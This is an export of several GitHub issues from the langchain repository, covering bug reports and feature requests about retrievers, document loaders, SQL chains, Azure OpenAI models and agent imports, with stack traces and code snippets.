### System Info langchain: 0.0.165 (and 0.0.151) python: 3.10 ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Use `RetrievalQAWithSourcesChain` with `Retriever` that returns some documents which the `LLMChainExtractor` compresses to empty strings which are filtered out for all documents, this results with a `IndexError` downstream from the compression. https://github.com/hwchase17/langchain/blob/f373883c1a5f451433e7817e5092f61e7bde3f2e/langchain/retrievers/document_compressors/chain_extract.py#L54-L61 Is the relevant code ^, maybe this code should gracefully fail if the `len(compressed_docs) == 0` at the end? <details> <summary>Error (click to unroll)</summary> ``` File ~/miniforge3/envs/foo/lib/python3.10/site-packages/langchain/chains/combine_documents/base.py:75, in BaseCombineDocumentsChain._call(self, inputs) 73 # Other keys are assumed to be needed for LLM prediction 74 other_keys = {k: v for k, v in inputs.items() if k != self.input_key} ---> 75 output, extra_return_dict = self.combine_docs(docs, **other_keys) 76 extra_return_dict[self.output_key] = output 77 return extra_return_dict File ~/miniforge3/envs/foo/lib/python3.10/site-packages/langchain/chains/combine_documents/map_reduce.py:139, in MapReduceDocumentsChain.combine_docs(self, docs, token_max, **kwargs) 131 def combine_docs( 132 self, docs: List[Document], token_max: int = 3000, **kwargs: Any 133 ) -> Tuple[str, dict]: 134 """Combine documents in a map reduce manner. 135 136 Combine by mapping first chain over all documents, then reducing the results. 137 This reducing can be done recursively if needed (if there are many documents). 138 """ --> 139 results = self.llm_chain.apply( 140 # FYI - this is parallelized and so it is fast. 141 [{**{self.document_variable_name: d.page_content}, **kwargs} for d in docs] 142 ) 143 return self._process_results(results, docs, token_max, **kwargs) File ~/miniforge3/envs/foo/lib/python3.10/site-packages/langchain/chains/llm.py:118, in LLMChain.apply(self, input_list) 116 def apply(self, input_list: List[Dict[str, Any]]) -> List[Dict[str, str]]: 117 """Utilize the LLM generate method for speed gains.""" --> 118 response = self.generate(input_list) 119 return self.create_outputs(response) File ~/miniforge3/envs/foo/lib/python3.10/site-packages/langchain/chains/llm.py:61, in LLMChain.generate(self, input_list) 59 def generate(self, input_list: List[Dict[str, Any]]) -> LLMResult: 60 """Generate LLM result from inputs.""" ---> 61 prompts, stop = self.prep_prompts(input_list) 62 return self.llm.generate_prompt(prompts, stop) File ~/miniforge3/envs/foo/lib/python3.10/site-packages/langchain/chains/llm.py:74, in LLMChain.prep_prompts(self, input_list) 72 """Prepare prompts from inputs.""" 73 stop = None ---> 74 if "stop" in input_list[0]: 75 stop = input_list[0]["stop"] 76 prompts = [] IndexError: list index out of range ``` </details> ### Expected behavior Not fail in a cryptic way (see the error in the reproduction).
`LLMChainExtractor` doesn't gracefully fail on empty compressed results
https://api.github.com/repos/langchain-ai/langchain/issues/4496/comments
4
2023-05-11T02:23:22Z
2023-10-21T16:09:15Z
https://github.com/langchain-ai/langchain/issues/4496
1,704,926,712
4,496
[ "langchain-ai", "langchain" ]
### Feature request The `EverNoteLoader` treats an export from Evernote as a very large text document by [combining the content from all notes](https://github.com/hwchase17/langchain/blob/master/langchain/document_loaders/evernote.py#L64-L68) into a single long text string. It also only saves the name of the [export file as metadata](https://github.com/hwchase17/langchain/blob/master/langchain/document_loaders/evernote.py#L81) on this large document. This isn't terribly useful when interrogating data from Evernote whereby you might export an entire notebook which contains many notes, see an example notebook export below which has two notes. Ideally we should treat each note as an independent document with it's own richer metadata e.g. created, updated, title etc. to make retrieval more effective. ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE en-export SYSTEM "http://xml.evernote.com/pub/evernote-export4.dtd"> <en-export export-date="20230611T011239Z" application="Evernote" version="10.56.9"> <note> <title>Test</title> <created>20230511T011217Z</created> <updated>20230511T011228Z</updated> <note-attributes> <author>Michael McGarry</author> </note-attributes> <content> <![CDATA[<?xml version="1.0" encoding="UTF-8" standalone="no"?> <!DOCTYPE en-note SYSTEM "http://xml.evernote.com/pub/enml2.dtd"><en-note><div>abc</div></en-note> ]]> </content> </note> <note> <title>Summer Training Program</title> <created>20221227T015948Z</created> <updated>20221227T020423Z</updated> <note-attributes> <author>Michael McGarry</author> <latitude>{redacted}</latitude> <longitude>{redacted}</longitude> <altitude>{redacted}</altitude> <source>mobile.iphone</source> </note-attributes> <content> <![CDATA[<?xml version="1.0" encoding="UTF-8" standalone="no"?> <!DOCTYPE en-note SYSTEM "http://xml.evernote.com/pub/enml2.dtd"><en-note><div><b>Jan - March 2022</b></div></en-note> ]]> </content> </note> </en-export> ``` ### Motivation Looking to add a tool to an agent which can interrogate my Evernote journal entries. ### Your contribution I can put together a PR for this.
Evernote Document Loader Concatenates All Notes Together
https://api.github.com/repos/langchain-ai/langchain/issues/4493/comments
1
2023-05-11T01:58:37Z
2023-05-19T21:28:19Z
https://github.com/langchain-ai/langchain/issues/4493
1,704,886,910
4,493
[ "langchain-ai", "langchain" ]
### System Info Langchain version: 0.0.72 Next.js version: v13.4.1 ### Who can help? @hwchase17 @vowelparrot ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I'm using next.js and want to integrate langchain with Chroma. The error happened when I try to import { Chroma } from "langchain/vectorstores" in a my next.js file. When I run npm run dev, the error message is in the screenshot below: <img width="922" alt="截屏2023-05-10 17 42 35" src="https://github.com/hwchase17/langchain/assets/67210127/8ec6a8d2-8753-4990-af2f-f2e66af7db6d"> These are all the imports I'm doing: <img width="797" alt="截屏2023-05-10 17 43 14" src="https://github.com/hwchase17/langchain/assets/67210127/57d0fb2f-416b-479e-9a15-1412afce4459"> I checked and the error message is caused by the first line. Below is my next.config.js <img width="691" alt="截屏2023-05-10 17 45 00" src="https://github.com/hwchase17/langchain/assets/67210127/47fc9dc6-56a3-4d06-b454-c2474af6eb2f"> ### Expected behavior I only expect it to compile successfully
[Urgent] Module build failed: UnhandledSchemeError: Reading from "node:fs/promises" is not handled by plugins (Unhandled scheme).
https://api.github.com/repos/langchain-ai/langchain/issues/4491/comments
10
2023-05-11T00:45:19Z
2024-05-30T12:07:38Z
https://github.com/langchain-ai/langchain/issues/4491
1,704,804,178
4,491
[ "langchain-ai", "langchain" ]
### System Info LangChain version 0.0.164 ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Add `return_intermediate_steps=True ` to ``` agent = PlanAndExecute( planner=planner, executer=executor, verbose=True, max_iterations=10) ``` ### Expected behavior Be able `print(response["intermediate_steps"])` to get intermediate steps. The Plan and Execute agent appears to work really well, but there is a lot of useful information in the intermediate steps, which can be utilized by other agents. Can the Plan and Execute agent output intermediate steps?
Return Intermediate Steps for Plan and Execute
https://api.github.com/repos/langchain-ai/langchain/issues/4485/comments
2
2023-05-10T22:04:36Z
2023-11-16T16:08:02Z
https://github.com/langchain-ai/langchain/issues/4485
1,704,687,837
4,485
[ "langchain-ai", "langchain" ]
### Feature request Allow the `TextLoader` to optionally auto detect the loaded file encoding. If the option is enabled the loader will try all detected encodings by order of detection confidence or raise an error. Also enhances the default raised exception to indicate which read path raised the exception. ### Motivation Permits loading large datasets of text files with unknown/arbitrary encodings. ### Your contribution Will submit a PR for this
TextLoader: auto detect file encodings
https://api.github.com/repos/langchain-ai/langchain/issues/4479/comments
0
2023-05-10T20:46:24Z
2023-05-18T13:55:16Z
https://github.com/langchain-ai/langchain/issues/4479
1,704,607,580
4,479
[ "langchain-ai", "langchain" ]
### Issue with current documentation: https://docs.langchain.com/docs/components/schema/text This has a typo. I cannot locate the Concepts docs in the git repo. ### Idea or request for content: Please provide this so I can begin proofing the docs
DOC: Cleanup text
https://api.github.com/repos/langchain-ai/langchain/issues/4474/comments
1
2023-05-10T19:34:08Z
2023-09-10T16:19:17Z
https://github.com/langchain-ai/langchain/issues/4474
1,704,519,100
4,474
[ "langchain-ai", "langchain" ]
### System Info langchain==0.0.164 python=3.11 system: Ubuntu ### Who can help? @eyurtsev @agola11 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [X] Tools / Toolkits - [X] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction - pip install langchain==0.0.164 - pip install pandas test.db is a valid data base that I can querry using sqlalchemy , "sqlite:///test.db" is a correct path to the database. - Using chains ``` from langchain import OpenAI, SQLDatabase, SQLDatabaseChain db = SQLDatabase.from_uri("sqlite:///test.db") llm = OpenAI(temperature=0) db_chain = SQLDatabaseChain.from_llm(llm, db, verbose=True, return_direct=True) db_chain("what is the average voltage in BOT table?") ``` - When using **Agents** ``` from langchain.agents import create_sql_agent from langchain.agents.agent_toolkits import SQLDatabaseToolkit from langchain.sql_database import SQLDatabase from langchain.llms.openai import OpenAI from langchain.agents import AgentExecutor db = SQLDatabase.from_uri("sqlite:///test.db") toolkit = SQLDatabaseToolkit(db=db) agent_executor = create_sql_agent( llm=OpenAI(temperature=0), toolkit=toolkit, verbose=True ) agent_executor.run("what is the average voltage in BOT table?") ``` ### Expected behavior **Error Message when using sqlchain:** `> Entering new SQLDatabaseChain chain... what is the average voltage in BOT table? SQLQuery: Output exceeds the [size limit](command:workbench.action.openSettings?%5B%22notebook.output.textLineLimit%22%5D). Open the full output data [in a text editor](command:workbench.action.openLargeOutput?331701b0-38ac-4236-b53e-32e91605560f)--------------------------------------------------------------------------- InvalidRequestError Traceback (most recent call last) Cell In[5], line 2 1 db_chain = SQLDatabaseChain.from_llm(llm, db, verbose=True, return_direct=True) ----> 2 db_chain("what is the average voltage in BOT table?") File [~/anaconda3/envs/langchain/lib/python3.11/site-packages/langchain/chains/base.py:140](https://file+.vscode-resource.vscode-cdn.net/home/sahand/querry_bot/sql_querry/~/anaconda3/envs/langchain/lib/python3.11/site-packages/langchain/chains/base.py:140), in Chain.__call__(self, inputs, return_only_outputs, callbacks) 138 except (KeyboardInterrupt, Exception) as e: 139 run_manager.on_chain_error(e) --> 140 raise e 141 run_manager.on_chain_end(outputs) 142 return self.prep_outputs(inputs, outputs, return_only_outputs) File [~/anaconda3/envs/langchain/lib/python3.11/site-packages/langchain/chains/base.py:134](https://file+.vscode-resource.vscode-cdn.net/home/sahand/querry_bot/sql_querry/~/anaconda3/envs/langchain/lib/python3.11/site-packages/langchain/chains/base.py:134), in Chain.__call__(self, inputs, return_only_outputs, callbacks) 128 run_manager = callback_manager.on_chain_start( 129 {"name": self.__class__.__name__}, 130 inputs, 131 ) 132 try: 133 outputs = ( --> 134 self._call(inputs, run_manager=run_manager) 135 if new_arg_supported 136 else self._call(inputs) 137 ) 138 except (KeyboardInterrupt, Exception) as e: ... 688 rbody, rcode, resp.data, rheaders, stream_error=stream_error 689 ) 690 return resp InvalidRequestError: Invalid URL (POST [/completions](https://file+.vscode-resource.vscode-cdn.net/completions))` **Error message when using agents** **Error:** ` --------------------------------------------------------------------------- ValidationError Traceback (most recent call last) Cell In[9], line 2 1 db = SQLDatabase.from_uri("sqlite:///test.db") ----> 2 toolkit = SQLDatabaseToolkit(db=db) 4 agent_executor = create_sql_agent( 5 llm=OpenAI(temperature=0), 6 toolkit=toolkit, 7 verbose=True 8 ) 9 agent_executor.run("what is the average voltage in BOT table?") File [~/anaconda3/envs/langchain/lib/python3.11/site-packages/pydantic/main.py:341](https://file+.vscode-resource.vscode-cdn.net/home/sahand/querry_bot/sql_querry/~/anaconda3/envs/langchain/lib/python3.11/site-packages/pydantic/main.py:341), in pydantic.main.BaseModel.__init__() ValidationError: 1 validation error for SQLDatabaseToolkit llm field required (type=value_error.missing) `
SQL databasechain InvalidRequestError
https://api.github.com/repos/langchain-ai/langchain/issues/4469/comments
10
2023-05-10T18:29:16Z
2024-04-09T17:03:08Z
https://github.com/langchain-ai/langchain/issues/4469
1,704,436,744
4,469
[ "langchain-ai", "langchain" ]
### Feature request @hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)? Probably, it is also implemented but I didn't find it. Thi method looks like something simple but very effective. ### Motivation Improving the quality of the prompts and the resulting generation quality. ### Your contribution I can try to implement it but need direction.
`SmartGPT` workflow
https://api.github.com/repos/langchain-ai/langchain/issues/4463/comments
3
2023-05-10T15:52:11Z
2023-08-11T22:44:29Z
https://github.com/langchain-ai/langchain/issues/4463
1,704,219,508
4,463
[ "langchain-ai", "langchain" ]
### System Info win 11 , ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction here I have `tryAgent()` function that will retrieve the chunked dataset from `DeepLake` and use it in `ConversationalRetrievalChain` I tried to add : ` retriever.search_kwargs['max_tokens_limit'] = 2000` `memory = ConversationTokenBufferMemory(llm=llm_davinci)` in order to set the limit_token. ````python chat_history = [ ("what is the used code architecture in the skillful project?", " The used code architecture in the skillful project is a .NET solution with multiple projects.") ] def tryAgent(question: str): db =DeepLake(dataset_path=dataset_settings["path"], read_only=True, embedding_function=embeddings retriever = db.as_retriever() retriever.search_kwargs['distance_metric'] = 'cos' retriever.search_kwargs['fetch_k'] = 100 retriever.search_kwargs['maximal_marginal_relevance'] = True retriever.search_kwargs['k'] = 10 retriever.search_kwargs['reduce_k_below_max_tokens'] = True retriever.search_kwargs['max_tokens_limit'] = 2000 memory = ConversationTokenBufferMemory(llm=llm_davinci) qa = ConversationalRetrievalChain.from_llm( llm=llm_davinci, memory=memory, retriever=retriever) result = qa({"question": question, "chat_history": chat_history}) return jsonify({ "response": result['answer'] }) ```` but I'm still getting this error message : ```sh raise self.handle_error_response( openai.error.InvalidRequestError: -7131 is less than the minimum of 0 - 'max_tokens' ``` ### Expected behavior expected to get the result from openai llm with the allowed token limit. considering that the retriever is only 2k token and the reset of token is for completion
unable to set the max_tokens with ConversationalRetrievalChain
https://api.github.com/repos/langchain-ai/langchain/issues/4461/comments
1
2023-05-10T15:35:24Z
2023-09-15T16:14:03Z
https://github.com/langchain-ai/langchain/issues/4461
1,704,193,973
4,461
[ "langchain-ai", "langchain" ]
disregard. error in dataframe construction (needed dataframe.apply(pd.to_numeric, errors='coerce')) attempting to run code: pandas_agent = create_pandas_dataframe_agent(llm=llm, df=dataframe, verbose=True, max_iterations=4) output = pandas_agent.run(question_phrase) LOGGING main.py line 346 dataframe data: strike call_open_interest put_open_interest net_gamma_$_at_strike 0 90.0 0.0 -135.0 -16430.931 1 95.0 1.0 -154.0 -18621.7218 ... [dataframe lines omitted for brevity]... 48 157.5 0.0 0.0 0.0 49 160.0 307.0 -2.0 37121.733 50 0.0 0.0 0.0 0.0 > Entering new AgentExecutor chain... Thought: I need to find the sum of the call_open_interest column Action: python_repl_ast Action Input: df['call_open_interest'].sum() Observation: can only concatenate str (not "float") to str Thought: I need to convert the float to a string Action: python_repl_ast Action Input: str(df['call_open_interest'].sum()) Observation: can only concatenate str (not "float") to str Thought: I need to convert the float to a string Action: python_repl_ast Action Input: str(df['call_open_interest'].sum()) Observation: can only concatenate str (not "float") to str
Toolkits - Pandas Dataframe Agent python_repl_ast can't seem to convert float to string to concatenate output
https://api.github.com/repos/langchain-ai/langchain/issues/4460/comments
0
2023-05-10T15:31:03Z
2023-05-10T15:49:00Z
https://github.com/langchain-ai/langchain/issues/4460
1,704,187,744
4,460
[ "langchain-ai", "langchain" ]
### System Info llm = AzureChatOpenAI(deployment_name="JacobTextDavinci03", model_name="text-davinci-003", max_tokens=1500) File "C:\Users\jwei\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\site-packages\openai\api_requestor.py", line 687, in _interpret_response_line raise self.handle_error_response( openai.error.InvalidRequestError: Resource not found It works well if I use gpt-3.5-turbo model. So I'm guessing it's something wrong with openai library that can't support text-davinci-003 ? ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction It's quite easy to reproduce. Just use follow example here : https://python.langchain.com/en/latest/modules/models/llms/integrations/azure_openai_example.html And it just won't work for other model except 3.5 gpt turbo. ### Expected behavior it should support azure all kinds of model there.
AzureOpenAI can't support other model like text-davinci-003
https://api.github.com/repos/langchain-ai/langchain/issues/4453/comments
7
2023-05-10T12:13:05Z
2023-09-19T16:11:27Z
https://github.com/langchain-ai/langchain/issues/4453
1,703,792,846
4,453
[ "langchain-ai", "langchain" ]
### Feature request `YoutubeLoader.from_youtube_url` accepts single URL format. It should be able to handle at least the most common types of Youtube urls out there. ### Motivation Current video id extraction is pretty naive. It doesn't handle anything than single specific type of youtube url. Any valid but different video address leads to exception. ### Your contribution I've prepared a PR where i've introduced `.extract_video_id` method. Under the hood it uses regex to find video id in most popular youtube urls. Regex is based on Youtube-dl solution which can be found here: https://github.com/ytdl-org/youtube-dl/blob/211cbfd5d46025a8e4d8f9f3d424aaada4698974/youtube_dl/extractor/youtube.py#L524
YoutubeLoader.from_youtube_url should handle common YT url formats
https://api.github.com/repos/langchain-ai/langchain/issues/4451/comments
0
2023-05-10T11:09:22Z
2023-05-15T14:45:21Z
https://github.com/langchain-ai/langchain/issues/4451
1,703,681,221
4,451
[ "langchain-ai", "langchain" ]
### System Info Latest version of langchain. ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Why if I try to follow this example here: https://python.langchain.com/en/latest/modules/ agents/plan_and_execute.html I get an import error! ImportError: cannot import name 'PlanAndExecute' from 'langchain.agents' 1 have the latest langchain version 0.0.163 and tried to uninstall and reinstall but the error remains. Thanks! ### Expected behavior Like in the documentation
Import error from official example (documentation)
https://api.github.com/repos/langchain-ai/langchain/issues/4448/comments
2
2023-05-10T10:34:18Z
2023-09-10T16:19:27Z
https://github.com/langchain-ai/langchain/issues/4448
1,703,613,599
4,448
[ "langchain-ai", "langchain" ]
### System Info Got this error with the official example from the documentation. ImportError: cannot import name 'PlanAndExecute' from 'langchain.agents' ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction from langchain.chat_models import ChatOpenAI from langchain.llms import OpenAI from langchain.agents import PlanAndExecute, load_agent_executor, load_chat_planner from langchain import SerpAPIWrapper from langchain.agents.tools import Tool from langchain import LLMMathChain search = SerpAPIWrapper() llm = OpenAI(temperature=0) search = SerpAPIWrapper() llm_math_chain = LLMMathChain.from_llm(llm=llm, verbose=True) tools = [ Tool( name = "Search", func=search.run, description="useful for when you need to answer questions about current events" ), Tool( name="Calculator", func=llm_math_chain.run, description="useful for when you need to answer questions about math" ), ] model = ChatOpenAI(temperature=0) planner = load_chat_planner(model) executor = load_agent_executor(model, tools, verbose=True) executor = load_agent_executor(model, tools, verbose=True) agent.run("Who is Leo DiCaprio's girlfriend? What is her current age raised to the 0.43 power?") ### Expected behavior > Entering new PlanAndExecute chain... steps=[Step(value="Search for Leo DiCaprio's girlfriend on the internet."), Step(value='Find her current age.'), Step(value='Raise her current age to the 0.43 power using a calculator or programming language.'), Step(value='Output the result.'), Step(value="Given the above steps taken, respond to the user's original question.\n\n")] > Entering new AgentExecutor chain... Action: ``` { "action": "Search", "action_input": "Who is Leo DiCaprio's girlfriend?" } ``` Observation: DiCaprio broke up with girlfriend Camila Morrone, 25, in the summer of 2022, after dating for four years. He's since been linked to another famous supermodel – Gigi Hadid. The power couple were first supposedly an item in September after being spotted getting cozy during a party at New York Fashion Week. Thought:Based on the previous observation, I can provide the answer to the current objective. Action: ``` { "action": "Final Answer", "action_input": "Leo DiCaprio is currently linked to Gigi Hadid." } ``` > Finished chain. ***** Step: Search for Leo DiCaprio's girlfriend on the internet. Response: Leo DiCaprio is currently linked to Gigi Hadid. > Entering new AgentExecutor chain... Action: ``` { "action": "Search", "action_input": "What is Gigi Hadid's current age?" } ``` Observation: 28 years Thought:Previous steps: steps=[(Step(value="Search for Leo DiCaprio's girlfriend on the internet."), StepResponse(response='Leo DiCaprio is currently linked to Gigi Hadid.'))] Current objective: value='Find her current age.' Action: ``` { "action": "Search", "action_input": "What is Gigi Hadid's current age?" } ``` Observation: 28 years Thought:Based on my search, Gigi Hadid's current age is 26 years old. Action: ``` { "action": "Final Answer", "action_input": "Gigi Hadid's current age is 26 years old." } ``` > Finished chain. ***** Step: Find her current age. Response: Gigi Hadid's current age is 26 years old. > Entering new AgentExecutor chain... Action: ``` { "action": "Calculator", "action_input": "26 ** 0.43" } ``` > Entering new LLMMathChain chain... 26 ** 0.43 ```text 26 ** 0.43 ``` ...numexpr.evaluate("26 ** 0.43")... Answer: 4.059182145592686 > Finished chain. Observation: Answer: 4.059182145592686 Thought:The current objective is to raise Gigi Hadid's age to the 0.43 power. Action: ``` { "action": "Calculator", "action_input": "26 ** 0.43" } ``` > Entering new LLMMathChain chain... 26 ** 0.43 ```text 26 ** 0.43 ``` ...numexpr.evaluate("26 ** 0.43")... Answer: 4.059182145592686 > Finished chain. Observation: Answer: 4.059182145592686 Thought:The answer to the current objective is 4.059182145592686. Action: ``` { "action": "Final Answer", "action_input": "Gigi Hadid's age raised to the 0.43 power is approximately 4.059 years." } ``` > Finished chain. ***** Step: Raise her current age to the 0.43 power using a calculator or programming language. Response: Gigi Hadid's age raised to the 0.43 power is approximately 4.059 years. > Entering new AgentExecutor chain... Action: ``` { "action": "Final Answer", "action_input": "Gigi Hadid's age raised to the 0.43 power is approximately 4.059 years." } ``` > Finished chain. ***** Step: Output the result. Response: Gigi Hadid's age raised to the 0.43 power is approximately 4.059 years. > Entering new AgentExecutor chain... Action: ``` { "action": "Final Answer", "action_input": "Gigi Hadid's age raised to the 0.43 power is approximately 4.059 years." } ``` > Finished chain. ***** Step: Given the above steps taken, respond to the user's original question. Response: Gigi Hadid's age raised to the 0.43 power is approximately 4.059 years. > Finished chain.
ImportError: cannot import name 'PlanAndExecute' from 'langchain.agents'
https://api.github.com/repos/langchain-ai/langchain/issues/4446/comments
3
2023-05-10T09:17:47Z
2023-09-15T16:14:13Z
https://github.com/langchain-ai/langchain/issues/4446
1,703,477,667
4,446
[ "langchain-ai", "langchain" ]
### System Info os : windows 11 I am trying to test the langchain selfretiever using chromadb and getting the below error. retriever = SelfQueryRetriever.from_llm(llm, vectorstore = vectordb, document_contents = document_content_description,metadata_field_info = metadata_field_info, verbose=True) I have also persisted vector store on disk and still facing the same error however the same code works on google colab.) **Error** ValueError: Self query retriever with Vector Store type not supported. ### Who can help? _No response_ ### Information - [x] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [x] LLMs/Chat Models - [x] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [x] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction https://python.langchain.com/en/latest/modules/indexes/retrievers/examples/self_query_retriever.html ### Expected behavior ValueError: Self query retriever with Vector Store type not supported.
Langchain -self query retreiver using chromadb/faiss
https://api.github.com/repos/langchain-ai/langchain/issues/4441/comments
2
2023-05-10T06:56:08Z
2024-03-12T01:51:50Z
https://github.com/langchain-ai/langchain/issues/4441
1,703,245,543
4,441
[ "langchain-ai", "langchain" ]
### System Info Langchain: 0.0.162 Python: 3.10 Platform: Linux ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction You can ask a Generative Agent to respond, say, asking a question like "give me the lyrics of a song", then the multiline response is trivially truncated due to the below line https://github.com/hwchase17/langchain/blob/f0cfed636f37ea7c5171541e0df3f814858f1550/langchain/experimental/generative_agents/generative_agent.py#LL160C9-L160C52 ### Expected behavior do not truncate multiline response.
Splitting response in Generative Agents truncates the result too much
https://api.github.com/repos/langchain-ai/langchain/issues/4440/comments
4
2023-05-10T06:35:34Z
2023-12-04T16:08:14Z
https://github.com/langchain-ai/langchain/issues/4440
1,703,221,602
4,440
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. We are unable to make multi input tools work consistently with conversational agent. Here is the scenario: User asks a question. Based on the question the agent needs to extract two inputs from the question and route it to the right tool for answer. If the user has not provided the two inputs, the agent needs to ask the user for those inputs, before using the tool. Finally it also needs to remember the inputs and not ask for those inputs again in subsequent messages from the user. I've tried various methods ranging from structured tool, structured agent, even regex matching, and nothing is producing consistent results. Could anyone please suggest any other ideas to solve this? Thank You! ### Suggestion: _No response_
Issue: Multi input tools do not work consistently with conversational agent
https://api.github.com/repos/langchain-ai/langchain/issues/4439/comments
3
2023-05-10T06:14:56Z
2023-10-23T16:08:43Z
https://github.com/langchain-ai/langchain/issues/4439
1,703,199,089
4,439
[ "langchain-ai", "langchain" ]
### System Info langchainversion: 0.0.163 llama_index version: 0.6.4 PyTorch version: 2.0.0+cu118 Transformers version: 4.30.0.dev0 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [x] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Run: ```python from llama_index import LLMPredictor, PromptHelper, ServiceContext, SimpleDirectoryReader, GPTVectorStoreIndex, GPTListIndex model_id = 'google/flan-t5-large' tokenizer = AutoTokenizer.from_pretrained(model_id) model = AutoModelForSeq2SeqLM.from_pretrained(model_id) pipe = pipeline( "text2text-generation", model=model, tokenizer=tokenizer, max_length=512 ) local_llm_g_flan_t5_large = HuggingFacePipeline(pipeline=pipe) print(local_llm_g_flan_t5_large('What is the capital of Germany? ')) print(local_llm_g_flan_t5_large('What is the capital of Spain? ')) print(local_llm_g_flan_t5_large('What is the capital of Canada? ')) # all is working untill here from llama_index import GPTListIndex, SimpleDirectoryReader, GPTVectorStoreIndex from langchain.embeddings import SentenceTransformerEmbeddings from llama_index import LangchainEmbedding, ServiceContext directory_path_ = '/content/dir' documents = SimpleDirectoryReader(directory_path_).load_data() llm_predictor = LLMPredictor(llm=local_llm_g_flan_t5_large) embed_model = SentenceTransformerEmbeddings(model_name="all-MiniLM-L6-v2") service_context = ServiceContext.from_defaults(embed_model=embed_model, llm_predictor=llm_predictor) index = GPTListIndex.from_documents(documents, service_context=service_context) ``` ``` --------------------------------------------------------------------------- AttributeError Traceback (most recent call last) <ipython-input-62-7d7e68b85aa2> in <cell line: 1>() ----> 1 index = GPTListIndex.from_documents(documents, service_context=service_context) 5 frames /usr/local/lib/python3.10/dist-packages/llama_index/token_counter/token_counter.py in wrapper_logic(_self) 48 49 start_token_ct = llm_predictor.total_tokens_used ---> 50 start_embed_token_ct = embed_model.total_tokens_used 51 52 yield AttributeError: 'HuggingFaceEmbeddings' object has no attribute 'total_tokens_used' ``` ### Expected behavior if try by using huggiface hub , it works fine but locally the same it does not work, my idea is to do context learning locally using this model
Run locally google flan t5 large issue with local embeddings
https://api.github.com/repos/langchain-ai/langchain/issues/4438/comments
2
2023-05-10T05:20:10Z
2023-10-31T16:07:30Z
https://github.com/langchain-ai/langchain/issues/4438
1,703,146,087
4,438
[ "langchain-ai", "langchain" ]
